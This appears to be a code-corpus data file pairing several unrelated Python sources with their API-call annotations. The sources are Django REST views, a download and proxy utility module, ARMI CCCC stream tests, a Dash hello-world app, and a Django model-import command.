group_config_id = self.kwargs.get('parent_lookup_obj_ref__group_config')
if group_config_id is not None:
group_config = GroupConfig.obj.get(id=group_config_id)
context.update({'obj_ref__group_config': group_config})
obj_ref_id = self.kwargs.get('parent_lookup_obj_ref')
if obj_ref_id is not None:
obj_ref = ObjectConfig.obj.get(id=obj_ref_id)
context.update({'obj_ref': obj_ref})
return context
class GroupConfigViewSet(
NestedViewSetMixin, viewsets.ModelViewSet
): # pylint: disable=too-many-ancestors
queryset = GroupConfig.objects.all()
serializer_class = serializers.GroupConfigSerializer
filterset_class = GroupConfigFilterSet
def get_serializer_context(self):
context = super().get_serializer_context()
if self.kwargs:
context.update({'group_config': self.get_object()})
return context
| [
"cm.models.GroupConfig.obj.get",
"django.contrib.contenttypes.models.ContentType.objects.get",
"cm.models.ObjectConfig.obj.get",
"cm.models.Host.objects.all",
"rest_framework.response.Response",
"cm.models.ObjectConfig.objects.all",
"django_filters.rest_framework.CharFilter",
"cm.models.GroupConfig.objects.all",
"cm.models.ConfigLog.objects.filter"
] | [((1177, 1268), 'django_filters.rest_framework.CharFilter', 'CharFilter', ([], {'field_name': '"""object_type"""', 'label': '"""object_type"""', 'method': '"""filter_object_type"""'}), "(field_name='object_type', label='object_type', method=\n 'filter_object_type')\n", (1187, 1268), False, 'from django_filters.rest_framework import FilterSet, CharFilter\n'), ((1839, 1857), 'cm.models.Host.objects.all', 'Host.objects.all', ([], {}), '()\n', (1855, 1857), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((3551, 3577), 'cm.models.ObjectConfig.objects.all', 'ObjectConfig.objects.all', ([], {}), '()\n', (3575, 3577), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((5629, 5654), 'cm.models.GroupConfig.objects.all', 'GroupConfig.objects.all', ([], {}), '()\n', (5652, 5654), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((1411, 1463), 'django.contrib.contenttypes.models.ContentType.objects.get', 'ContentType.objects.get', ([], {'app_label': '"""cm"""', 'model': 'value'}), "(app_label='cm', model=value)\n", (1434, 1463), False, 'from django.contrib.contenttypes.models import ContentType\n'), ((2183, 2226), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_204_NO_CONTENT'}), '(status=status.HTTP_204_NO_CONTENT)\n', (2191, 2226), False, 'from rest_framework.response import Response\n'), ((3001, 3040), 'cm.models.GroupConfig.obj.get', 'GroupConfig.obj.get', ([], {'id': 'group_config_id'}), '(id=group_config_id)\n', (3020, 3040), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((2456, 2495), 'cm.models.GroupConfig.obj.get', 'GroupConfig.obj.get', ([], {'id': 'group_config_id'}), '(id=group_config_id)\n', (2475, 2495), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((3315, 3354), 'cm.models.GroupConfig.obj.get', 'GroupConfig.obj.get', ([], {'id': 'group_config_id'}), '(id=group_config_id)\n', (3334, 3354), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((3870, 3909), 'cm.models.GroupConfig.obj.get', 'GroupConfig.obj.get', ([], {'id': 'group_config_id'}), '(id=group_config_id)\n', (3889, 3909), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((4137, 4172), 'cm.models.ObjectConfig.obj.get', 'ObjectConfig.obj.get', ([], {'id': 'obj_ref_id'}), '(id=obj_ref_id)\n', (4157, 4172), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((5164, 5203), 'cm.models.GroupConfig.obj.get', 'GroupConfig.obj.get', ([], {'id': 'group_config_id'}), '(id=group_config_id)\n', (5183, 5203), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((5391, 5426), 'cm.models.ObjectConfig.obj.get', 'ObjectConfig.obj.get', ([], {'id': 'obj_ref_id'}), '(id=obj_ref_id)\n', (5411, 5426), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n'), ((4875, 4909), 'cm.models.ConfigLog.objects.filter', 'ConfigLog.objects.filter', ([], {}), '(**kwargs)\n', (4899, 4909), False, 'from cm.models import GroupConfig, Host, ObjectConfig, ConfigLog\n')] |
# -*- coding:utf-8 -*-
from __future__ import absolute_import
import logging
import os
import shutil
import subprocess
import time
from decimal import getcontext, Decimal
from urllib.request import urlopen
def set_time_zone(tz: str = "Asia/Shanghai"):
os.environ['TZ'] = tz
time.tzset()
def set_proxy(http_proxy="http://127.0.0.1:8118"):
""" 设置代理 """
os.environ["https_proxy"] = http_proxy
os.environ["HTTPS_PROXY"] = http_proxy
os.environ["http_proxy"] = http_proxy
os.environ["HTTP_PROXY"] = http_proxy
def clear_proxy_setting():
""" 取消全局代理设置 """
proxy_keys = {"HTTP_PROXY", "HTTPS_PROXY", "ALL_PROXY"}
for key in proxy_keys:
if key in os.environ:
del os.environ[key]
_key = key.lower()
if _key in os.environ:
del os.environ[_key]
def download_big_file(url, target_file_name):
"""
    Download a large file using only the Python standard library.
ref: https://stackoverflow.com/questions/1517616/stream-large-binary-files-with-urllib2-to-file
"""
response = urlopen(url)
    chunk_size = 16 * 1024
    with open(target_file_name, 'wb') as f:
        while True:
            # read the response in fixed-size chunks until exhausted
            chunk = response.read(chunk_size)
            if not chunk:
                break
            f.write(chunk)
def download_big_file_with_wget(url, target_file_name):
"""
    Download a large file with wget.
    Note: wget must be installed on the system.
    """
    download_process = subprocess.Popen(["wget", "-c", "-O", target_file_name, url])
download_process.wait()
if not os.path.exists(target_file_name):
raise Exception("fail to download file from {}".format(url))
def remove_path_or_file(path_or_file_name):
"""
    Remove a file or a whole directory tree.
"""
if not os.path.exists(path_or_file_name):
logging.warning("{} not exists!".format(path_or_file_name))
return
if os.path.isdir(path_or_file_name):
# dir
shutil.rmtree(path_or_file_name)
else:
# file
os.remove(path_or_file_name)
def get_pretty_float(num: float, count: int = 2) -> str:
"""
    Format num in engineering notation with the given number of significant digits.
Args:
num: float
count: int
"""
getcontext().prec = count
return (Decimal(num) / Decimal(1)).to_eng_string()
| [
"os.path.exists",
"decimal.getcontext",
"time.tzset",
"os.path.isdir",
"shutil.rmtree",
"urllib.request.urlopen",
"decimal.Decimal",
"os.remove"
] | [((285, 297), 'time.tzset', 'time.tzset', ([], {}), '()\n', (295, 297), False, 'import time\n'), ((1036, 1048), 'urllib.request.urlopen', 'urlopen', (['url'], {}), '(url)\n', (1043, 1048), False, 'from urllib.request import urlopen\n'), ((1827, 1859), 'os.path.isdir', 'os.path.isdir', (['path_or_file_name'], {}), '(path_or_file_name)\n', (1840, 1859), False, 'import os\n'), ((1512, 1544), 'os.path.exists', 'os.path.exists', (['target_file_name'], {}), '(target_file_name)\n', (1526, 1544), False, 'import os\n'), ((1701, 1734), 'os.path.exists', 'os.path.exists', (['path_or_file_name'], {}), '(path_or_file_name)\n', (1715, 1734), False, 'import os\n'), ((1883, 1915), 'shutil.rmtree', 'shutil.rmtree', (['path_or_file_name'], {}), '(path_or_file_name)\n', (1896, 1915), False, 'import shutil\n'), ((1949, 1977), 'os.remove', 'os.remove', (['path_or_file_name'], {}), '(path_or_file_name)\n', (1958, 1977), False, 'import os\n'), ((2128, 2140), 'decimal.getcontext', 'getcontext', ([], {}), '()\n', (2138, 2140), False, 'from decimal import getcontext, Decimal\n'), ((2166, 2178), 'decimal.Decimal', 'Decimal', (['num'], {}), '(num)\n', (2173, 2178), False, 'from decimal import getcontext, Decimal\n'), ((2181, 2191), 'decimal.Decimal', 'Decimal', (['(1)'], {}), '(1)\n', (2188, 2191), False, 'from decimal import getcontext, Decimal\n')] |
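A short usage sketch for the helpers above, assuming the module is importable; the proxy address, URL, and paths are placeholders:

set_proxy("http://127.0.0.1:8118")            # route traffic through a local proxy
download_big_file("https://example.com/big.bin", "/tmp/big.bin")
clear_proxy_setting()
remove_path_or_file("/tmp/big.bin")
print(get_pretty_float(12345.678, count=3))   # engineering notation, 3 significant digits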
# Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import io
import six
from armi.nuclearDataIO import cccc
from armi.localization import exceptions
class CcccIOStreamTests(unittest.TestCase):
def test_initWithFileMode(self):
self.assertIsInstance(cccc.Stream("some-file", "rb"), cccc.Stream)
self.assertIsInstance(cccc.Stream("some-file", "wb"), cccc.Stream)
self.assertIsInstance(cccc.Stream("some-file", "r"), cccc.Stream)
self.assertIsInstance(cccc.Stream("some-file", "w"), cccc.Stream)
with self.assertRaises(exceptions.InvalidSelectionError):
cccc.Stream("some-file", "bacon")
class CcccBinaryRecordTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.writerClass = cccc.BinaryRecordWriter
cls.readerClass = cccc.BinaryRecordReader
def setUp(self):
self.streamCls = io.BytesIO
def test_writeAndReadSimpleIntegerRecord(self):
value = 42
stream = self.streamCls()
with self.writerClass(stream) as writer:
writer.rwInt(value)
with self.readerClass(self.streamCls(stream.getvalue())) as reader:
self.assertEqual(writer.numBytes, reader.numBytes)
self.assertEqual(value, reader.rwInt(None))
self.assertEqual(4, writer.numBytes)
def test_writeAndReadSimpleFloatRecord(self):
stream = self.streamCls()
value = -33.322222
with self.writerClass(stream) as writer:
writer.rwFloat(value)
with self.readerClass(self.streamCls(stream.getvalue())) as reader:
self.assertEqual(writer.numBytes, reader.numBytes)
self.assertAlmostEqual(value, reader.rwFloat(None), 5)
self.assertEqual(4, writer.numBytes)
def test_writeAndReadSimpleStringRecord(self):
stream = self.streamCls()
value = "Howdy, partner!"
size = 8 * 8
with self.writerClass(stream) as writer:
writer.rwString(value, size)
with self.readerClass(self.streamCls(stream.getvalue())) as reader:
self.assertEqual(writer.numBytes, reader.numBytes)
self.assertEqual(value, reader.rwString(None, size))
self.assertEqual(size, writer.numBytes)
def test_notReadingAnEntireRecordRaisesException(self):
# I'm going to create a record with two pieces of data, and only read one...
stream = self.streamCls()
value = 99
with self.writerClass(stream) as writer:
writer.rwInt(value)
writer.rwInt(value)
self.assertEqual(8, writer.numBytes)
with self.assertRaises(exceptions.CcccRecordError):
with self.readerClass(self.streamCls(stream.getvalue())) as reader:
self.assertEqual(value, reader.rwInt(None))
def test_readingBeyondRecordRaisesException(self):
# I'm going to create a record with two pieces of data, and only read one...
stream = self.streamCls()
value = 77
with self.writerClass(stream) as writer:
writer.rwInt(value)
self.assertEqual(4, writer.numBytes)
with self.assertRaises(exceptions.CcccRecordError):
with self.readerClass(self.streamCls(stream.getvalue())) as reader:
self.assertEqual(value, reader.rwInt(None))
self.assertEqual(4, reader.rwInt(None))
class CcccAsciiRecordTests(CcccBinaryRecordTests):
"""Runs the same tests as CcccBinaryRecordTests, but using ASCII readers and writers."""
@classmethod
def setUpClass(cls):
cls.writerClass = cccc.AsciiRecordWriter
cls.readerClass = cccc.AsciiRecordReader
def setUp(self):
self.streamCls = six.StringIO
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| [
"unittest.main",
"armi.nuclearDataIO.cccc.Stream"
] | [((4359, 4374), 'unittest.main', 'unittest.main', ([], {}), '()\n', (4372, 4374), False, 'import unittest\n'), ((810, 840), 'armi.nuclearDataIO.cccc.Stream', 'cccc.Stream', (['"""some-file"""', '"""rb"""'], {}), "('some-file', 'rb')\n", (821, 840), False, 'from armi.nuclearDataIO import cccc\n'), ((885, 915), 'armi.nuclearDataIO.cccc.Stream', 'cccc.Stream', (['"""some-file"""', '"""wb"""'], {}), "('some-file', 'wb')\n", (896, 915), False, 'from armi.nuclearDataIO import cccc\n'), ((960, 989), 'armi.nuclearDataIO.cccc.Stream', 'cccc.Stream', (['"""some-file"""', '"""r"""'], {}), "('some-file', 'r')\n", (971, 989), False, 'from armi.nuclearDataIO import cccc\n'), ((1034, 1063), 'armi.nuclearDataIO.cccc.Stream', 'cccc.Stream', (['"""some-file"""', '"""w"""'], {}), "('some-file', 'w')\n", (1045, 1063), False, 'from armi.nuclearDataIO import cccc\n'), ((1156, 1189), 'armi.nuclearDataIO.cccc.Stream', 'cccc.Stream', (['"""some-file"""', '"""bacon"""'], {}), "('some-file', 'bacon')\n", (1167, 1189), False, 'from armi.nuclearDataIO import cccc\n')] |
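The same binary round-trip the tests above exercise, written as a standalone sketch:

import io
from armi.nuclearDataIO import cccc

stream = io.BytesIO()
with cccc.BinaryRecordWriter(stream) as writer:
    writer.rwInt(42)
    writer.rwFloat(-33.322222)
with cccc.BinaryRecordReader(io.BytesIO(stream.getvalue())) as reader:
    # reads back 42 and approximately -33.322222
    print(reader.rwInt(None), reader.rwFloat(None))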
from flask import Flask
from dash import Dash
import dash_core_components as dcc
import dash_html_components as html
# commonly used css stylesheet
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
# spin up the Flask server
server = Flask(__name__)
# spin up the Dash app on the Flask server
app = Dash(__name__, server=server, external_stylesheets=external_stylesheets)
# app html layout
app.layout = html.Div([
# classic hello world statement for proof of success
html.Div([
html.H1("Hello from Dash!"),
], style={'textAlign': "center"}),
])
if __name__ == '__main__':
# run server
app.run_server(debug=True)
| [
"dash_html_components.H1",
"dash.Dash",
"flask.Flask"
] | [((251, 266), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (256, 266), False, 'from flask import Flask\n'), ((308, 380), 'dash.Dash', 'Dash', (['__name__'], {'server': 'server', 'external_stylesheets': 'external_stylesheets'}), '(__name__, server=server, external_stylesheets=external_stylesheets)\n', (312, 380), False, 'from dash import Dash\n'), ((509, 536), 'dash_html_components.H1', 'html.H1', (['"""Hello from Dash!"""'], {}), "('Hello from Dash!')\n", (516, 536), True, 'import dash_html_components as html\n')] |
from django.core.management.base import BaseCommand, CommandError
from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption
from django.core import serializers
#dirty python2.6 fix
try:
from collections import Counter
except:
def Counter(list):
return set(list)
from optparse import make_option
class Command(BaseCommand):
args = 'file_name'
help = 'Imports all models from the file named "file_name". All models in the database which have the same uuid as imported models are updated. The folowing models are included in inport: AbstractWidget, Category, AbstractInput, AbstractOutput, and AbstractOption.'
option_list = BaseCommand.option_list + (
make_option('-r', '--replace',
action="store_true",
dest='replace',
default=False,
help='Completely replace whole widgets with the new one where UIDs match. Default behaviour merges widgets submodels (AbstractInputs, AbstractOutputs and AbstratcOptions)'
'based on their submodel\'s own UID. When using this option all widget\'s old submodels are deleted and completely replaced by new submodels.)'
),
)
def handle(self, *args, **options):
if (len(args)<1):
raise CommandError('Arguments "file_name" is required!')
try:
string = open(args[0], 'r').read()
except:
raise CommandError('There was a problem with opening given input file')
import_package_string(self.stdout.write, string, options['replace'], int(options['verbosity']))
self.stdout.write('Import procedure successfully finished.\n')
def import_package_string(writeFunc, string, replace, verbosity=1):
#get all objects from file and eliminate empty UID and check for UID duplicates
objsFileRaw = serializers.deserialize("json", string)
objsFile = list(objsFileRaw)
    #order file models - essential for successful import
#TODO: following ordering could be done more efficiently
objsFile = order_objects_hier_top(objsFile)
objsFileNoUid = [x for x in objsFile if len(x.object.uid) == 0]
objsFile = [x for x in objsFile if len(x.object.uid) != 0]
if len(objsFileNoUid)>0:
writeFunc('File contains %i model(s) without UID field set. Those will not be imported! If you wish to'
' assign them random UIDs then use the "-n" option when exporting models with the "export_package"'
' command. Afterwards, you will be able to import them.\n' % len(objsFileNoUid))
if len(Counter([x.object.uid for x in objsFile])) != len(objsFile):
a = sorted([x.object.uid for x in objsFile])
for x in a:
print(x)
raise CommandError('Input process terminated without any changes to the database. There were multiple equal '
'UIDs defined on different models in the given input file. The input procedure can not continue '
'from safety reasons. Please resolve manually!')
#divide new objects by type
wids = [x for x in objsFile if isinstance(x.object, AbstractWidget)]
inps = [x for x in objsFile if isinstance(x.object, AbstractInput)]
outs = [x for x in objsFile if isinstance(x.object, AbstractOutput)]
opts = [x for x in objsFile if isinstance(x.object, AbstractOption)]
cats = [x for x in objsFile if isinstance(x.object, Category)]
    #output statistics about file
if verbosity>0:
writeFunc('Import file contains:\n')
writeFunc(' % 4i AbstractWidget(s)\n' % len(wids))
writeFunc(' % 4i AbstractInput(s)\n' % len(inps))
writeFunc(' % 4i AbstractOutput(s)\n' % len(outs))
writeFunc(' % 4i AbstractOption(s)\n' % len(opts))
writeFunc(' % 4i Category(s)\n' % len(cats))
#get all objects from database
objsDb = []
objsDb.extend(AbstractWidget.objects.all())
objsDb.extend(AbstractInput.objects.all())
objsDb.extend(AbstractOutput.objects.all())
objsDb.extend(AbstractOption.objects.all())
objsDb.extend(Category.objects.all())
#check for DB UID duplicates
objsdbDict = dict((x.uid,x) for x in objsDb if len(x.uid) != 0)
if len([x for x in objsDb if len(x.uid) != 0]) != len(objsdbDict):
error_txt= 'Input process terminated without any changes to the database. There were multiple equal ' \
'UIDs defined on different models in the database. The input procedure can not continue ' \
'from safety reasons. Please resolve manually! UIDs with multiple models:'
#count objects per uid
from collections import defaultdict
objs_per_uid=defaultdict(list)
for x in objsDb:
if x.uid:
objs_per_uid[x.uid].append(x)
for uid,objs in list(objs_per_uid.items()):
if len(objs)>1:
error_txt+="\n\nUID: "+str(uid)+"\nobjects: "+str(objs)
raise CommandError(error_txt)
#create new to existing id mapping and check for type match
idMappingDict = dict()
for objFile in objsFile:
if objFile.object.uid in objsdbDict:
objDb = objsdbDict[objFile.object.uid]
objFileTypeId = str(type(objFile.object))+':'+str(objFile.object.id)
objDbTypeId = str(type(objDb))+':'+str(objDb.id)
if type(objFile.object) == type(objsdbDict[objFile.object.uid]):
idMappingDict[objFileTypeId] = objDb.id
else:
raise CommandError('Input process terminated without any changes to the database. Two models match by uid but not '
'by type:\n - from file: id: %s uid: %s\n - from database: id: %s uid: %s\n Please resolve manually!'%
(objFileTypeId, objFile.object.uid, objDbTypeId, objsdbDict[objFile.object.uid].uid))
    #output statistics about database
if verbosity>0:
writeFunc('Current database contains %i models,\n' % len(objsDb))
writeFunc(' of which %i models have UID set,\n' % len(objsdbDict))
writeFunc(' of which %i models match with the imported models and will be updated.\n' % len(idMappingDict))
#prepare statistics
statDict = dict([('old:'+str(t),len(t.objects.all())) for t in [AbstractWidget, AbstractInput, AbstractOutput, AbstractOption, Category]])
for modelType in [AbstractWidget, AbstractInput, AbstractOutput, AbstractOption, Category]:
for operation in ['mod','add','del']:
statDict[operation+':'+str(modelType)]=0
#save models to the database - update the ids for the matching models and remove the ids (to get a new one) for the non matching models
    #the import needs to be done in a specific order! Hierarchically top down - all superior objects need to be imported prior to importing sub objects
#order: parent categories>sub categories>widgets>inputs>outputs>options
if verbosity>0:
writeFunc('Merging file and database models ...' + ('\n' if verbosity>1 else ''))
importedUids = dict()
for objFile in objsFile:
objFileTypeId = str(type(objFile.object))+':'+str(objFile.object.id)
if verbosity>1:
objFileTypeIdStr = objFileTypeId.replace(":",":"+" "*(47-len(objFileTypeId)))
if objFileTypeId in idMappingDict:
writeFunc('updating: ' + objFileTypeIdStr + ' => <db_id>: ' + str(idMappingDict[objFileTypeId]) + '\n')
else:
writeFunc(' adding: ' + objFileTypeIdStr + '\n')
#parent category needs to be already imported and added to idMappingDict
if isinstance(objFile.object, Category):
if not objFile.object.parent_id is None:
objId = idMappingDict[str(Category)+':'+str(objFile.object.parent_id)]
if verbosity>2:
writeFunc('% 52s'%'rewiring parent category from <file_id>:' + '% 5i'%objFile.object.parent_id + ' => <db_id>: %i\n'%objId)
objFile.object.parent = Category.objects.get(id=objId)
#widget's category needs to be already imported and added to idMappingDict
if isinstance(objFile.object, AbstractWidget):
objId = idMappingDict[str(Category) + ':' + str(objFile.object.category_id)]
if verbosity>2:
writeFunc('% 52s'%'rewiring widget\'s category from <file_id>:' + '% 5i'%objFile.object.category_id + ' => <db_id>: %i\n'%objId)
objFile.object.category = Category.objects.get(id=objId)
#input/output's widget needs to be already imported and added to idMappingDict
if isinstance(objFile.object, AbstractInput) or isinstance(objFile.object, AbstractOutput):
objId = idMappingDict[str(AbstractWidget) + ':' + str(objFile.object.widget_id)]
if verbosity>2:
writeFunc('% 52s'%'rewiring containing widget from <file_id>:' + '% 5i'%objFile.object.widget_id + ' => <db_id>: %i\n'%objId)
objFile.object.widget = AbstractWidget.objects.get(id=objId)
        #option's input needs to be already imported and added to idMappingDict
if isinstance(objFile.object, AbstractOption):
objId = idMappingDict[str(AbstractInput) + ':' + str(objFile.object.abstract_input_id)]
if verbosity>2:
writeFunc('% 52s'%'rewiring containing input from <file_id>:' + '% 5i'%objFile.object.abstract_input_id + ' => <db_id>: %i\n'%objId)
objFile.object.abstract_input = AbstractInput.objects.get(id=objId)
#update existing model or add a new one
if objFileTypeId in idMappingDict:
#there is already an existing model with same uid
statDict['mod:'+str(type(objFile.object))]+=1
objFile.object.id = idMappingDict[objFileTypeId]
else:
#there is no model jet, add it
statDict['add:'+str(type(objFile.object))]+=1
objFile.object.id = None
objFile.save() #actual saving to the DB, if object is new then id is assigend at this point
#dictionary bookkeeping
idMappingDict[objFileTypeId] = objFile.object.id
importedUids[objFile.object.uid]=True
if verbosity>0:
writeFunc(' done.\n')
if replace:
if verbosity>0:
writeFunc('Removing unnecessary inputs/options/outputs...')
for wid in [wid for wid in objsFile if isinstance(wid.object, AbstractWidget)]:
for inp in AbstractInput.objects.filter(widget = wid.object.id):
for opt in AbstractOption.objects.filter(abstract_input = inp.id):
if opt.uid not in importedUids:
statDict['del:'+str(AbstractOption)]+=1
opt.delete()
if inp.uid not in importedUids:
statDict['del:'+str(AbstractInput)]+=1
inp.delete()
for out in AbstractOutput.objects.filter(widget = wid.object.id):
if out.uid not in importedUids:
statDict['del:'+str(AbstractOutput)]+=1
out.delete()
if verbosity>0:
writeFunc(' done.\n')
#update and output statistics
if verbosity>0:
statDict = dict(list(statDict.items()) + list(dict([('new:'+str(t),len(t.objects.all())) for t in [AbstractWidget, AbstractInput, AbstractOutput, AbstractOption, Category]]).items()))
writeFunc('Database models count statistics: pre-import + ( added | modified | deleted ) = after-import\n')
for t in [AbstractWidget, AbstractInput, AbstractOutput, AbstractOption, Category]:
writeFunc(' % 15s: % 5i + (% 4i | % 4i | % 4i ) = % 5i\n' %
(t.__name__,
statDict['old:'+str(t)],
statDict['add:'+str(t)],
statDict['mod:'+str(t)],
statDict['del:'+str(t)],
statDict['new:'+str(t)]))
def order_objects_hier_top(objsFile):
objsFileOrdered = []
for topCat in [x for x in objsFile if (isinstance(x.object, Category) and x.object.parent_id is None)]:
objsFileOrdered.extend(order_objects_hier(topCat, objsFile))
return objsFileOrdered
def order_objects_hier(cat, objsFile):
assert isinstance(cat.object, Category)
assert isinstance(objsFile, list)
objsFileOrdered = []
objsFileOrdered.append(cat)
for wid in [x for x in objsFile if (isinstance(x.object, AbstractWidget) and x.object.category_id == cat.object.id)]:
objsFileOrdered.append(wid)
for inp in [x for x in objsFile if (isinstance(x.object, AbstractInput) and x.object.widget_id == wid.object.id)]:
objsFileOrdered.append(inp)
for opt in [x for x in objsFile if (isinstance(x.object, AbstractOption) and x.object.abstract_input_id == inp.object.id)]:
objsFileOrdered.append(opt)
for outp in [x for x in objsFile if (isinstance(x.object, AbstractOutput) and x.object.widget_id == wid.object.id)]:
objsFileOrdered.append(outp)
for subCat in [x for x in objsFile if (isinstance(x.object, Category) and x.object.parent_id == cat.object.id)]:
objsFileOrdered.extend(order_objects_hier(subCat,objsFile))
return objsFileOrdered | [
"workflows.models.AbstractInput.objects.filter",
"django.core.serializers.deserialize",
"workflows.models.AbstractWidget.objects.all",
"workflows.models.AbstractOutput.objects.all",
"workflows.models.AbstractOption.objects.all",
"collections.Counter",
"workflows.models.AbstractInput.objects.get",
"collections.defaultdict",
"optparse.make_option",
"django.core.management.base.CommandError",
"workflows.models.Category.objects.get",
"workflows.models.AbstractWidget.objects.get",
"workflows.models.Category.objects.all",
"workflows.models.AbstractOption.objects.filter",
"workflows.models.AbstractInput.objects.all",
"workflows.models.AbstractOutput.objects.filter"
] | [((1863, 1902), 'django.core.serializers.deserialize', 'serializers.deserialize', (['"""json"""', 'string'], {}), "('json', string)\n", (1886, 1902), False, 'from django.core import serializers\n'), ((2773, 3027), 'django.core.management.base.CommandError', 'CommandError', (['"""Input process terminated without any changes to the database. There were multiple equal UIDs defined on different models in the given input file. The input procedure can not continue from safety reasons. Please resolve manually!"""'], {}), "(\n 'Input process terminated without any changes to the database. There were multiple equal UIDs defined on different models in the given input file. The input procedure can not continue from safety reasons. Please resolve manually!'\n )\n", (2785, 3027), False, 'from django.core.management.base import BaseCommand, CommandError\n'), ((3941, 3969), 'workflows.models.AbstractWidget.objects.all', 'AbstractWidget.objects.all', ([], {}), '()\n', (3967, 3969), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((3989, 4016), 'workflows.models.AbstractInput.objects.all', 'AbstractInput.objects.all', ([], {}), '()\n', (4014, 4016), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((4036, 4064), 'workflows.models.AbstractOutput.objects.all', 'AbstractOutput.objects.all', ([], {}), '()\n', (4062, 4064), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((4084, 4112), 'workflows.models.AbstractOption.objects.all', 'AbstractOption.objects.all', ([], {}), '()\n', (4110, 4112), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((4132, 4154), 'workflows.models.Category.objects.all', 'Category.objects.all', ([], {}), '()\n', (4152, 4154), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((4746, 4763), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (4757, 4763), False, 'from collections import defaultdict\n'), ((5028, 5051), 'django.core.management.base.CommandError', 'CommandError', (['error_txt'], {}), '(error_txt)\n', (5040, 5051), False, 'from django.core.management.base import BaseCommand, CommandError\n'), ((733, 1142), 'optparse.make_option', 'make_option', (['"""-r"""', '"""--replace"""'], {'action': '"""store_true"""', 'dest': '"""replace"""', 'default': '(False)', 'help': '"""Completely replace whole widgets with the new one where UIDs match. Default behaviour merges widgets submodels (AbstractInputs, AbstractOutputs and AbstratcOptions)based on their submodel\'s own UID. When using this option all widget\'s old submodels are deleted and completely replaced by new submodels.)"""'}), '(\'-r\', \'--replace\', action=\'store_true\', dest=\'replace\', default\n =False, help=\n "Completely replace whole widgets with the new one where UIDs match. Default behaviour merges widgets submodels (AbstractInputs, AbstractOutputs and AbstratcOptions)based on their submodel\'s own UID. 
When using this option all widget\'s old submodels are deleted and completely replaced by new submodels.)"\n )\n', (744, 1142), False, 'from optparse import make_option\n'), ((1303, 1353), 'django.core.management.base.CommandError', 'CommandError', (['"""Arguments "file_name" is required!"""'], {}), '(\'Arguments "file_name" is required!\')\n', (1315, 1353), False, 'from django.core.management.base import BaseCommand, CommandError\n'), ((2604, 2645), 'collections.Counter', 'Counter', (['[x.object.uid for x in objsFile]'], {}), '([x.object.uid for x in objsFile])\n', (2611, 2645), False, 'from collections import Counter\n'), ((8584, 8614), 'workflows.models.Category.objects.get', 'Category.objects.get', ([], {'id': 'objId'}), '(id=objId)\n', (8604, 8614), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((9102, 9138), 'workflows.models.AbstractWidget.objects.get', 'AbstractWidget.objects.get', ([], {'id': 'objId'}), '(id=objId)\n', (9128, 9138), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((9597, 9632), 'workflows.models.AbstractInput.objects.get', 'AbstractInput.objects.get', ([], {'id': 'objId'}), '(id=objId)\n', (9622, 9632), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((10570, 10620), 'workflows.models.AbstractInput.objects.filter', 'AbstractInput.objects.filter', ([], {'widget': 'wid.object.id'}), '(widget=wid.object.id)\n', (10598, 10620), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((11023, 11074), 'workflows.models.AbstractOutput.objects.filter', 'AbstractOutput.objects.filter', ([], {'widget': 'wid.object.id'}), '(widget=wid.object.id)\n', (11052, 11074), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((1449, 1514), 'django.core.management.base.CommandError', 'CommandError', (['"""There was a problem with opening given input file"""'], {}), "('There was a problem with opening given input file')\n", (1461, 1514), False, 'from django.core.management.base import BaseCommand, CommandError\n'), ((5584, 5905), 'django.core.management.base.CommandError', 'CommandError', (['("""Input process terminated without any changes to the database. Two models match by uid but not by type:\n - from file: id: %s uid: %s\n - from database: id: %s uid: %s\n Please resolve manually!"""\n % (objFileTypeId, objFile.object.uid, objDbTypeId, objsdbDict[objFile.\n object.uid].uid))'], {}), '(\n """Input process terminated without any changes to the database. 
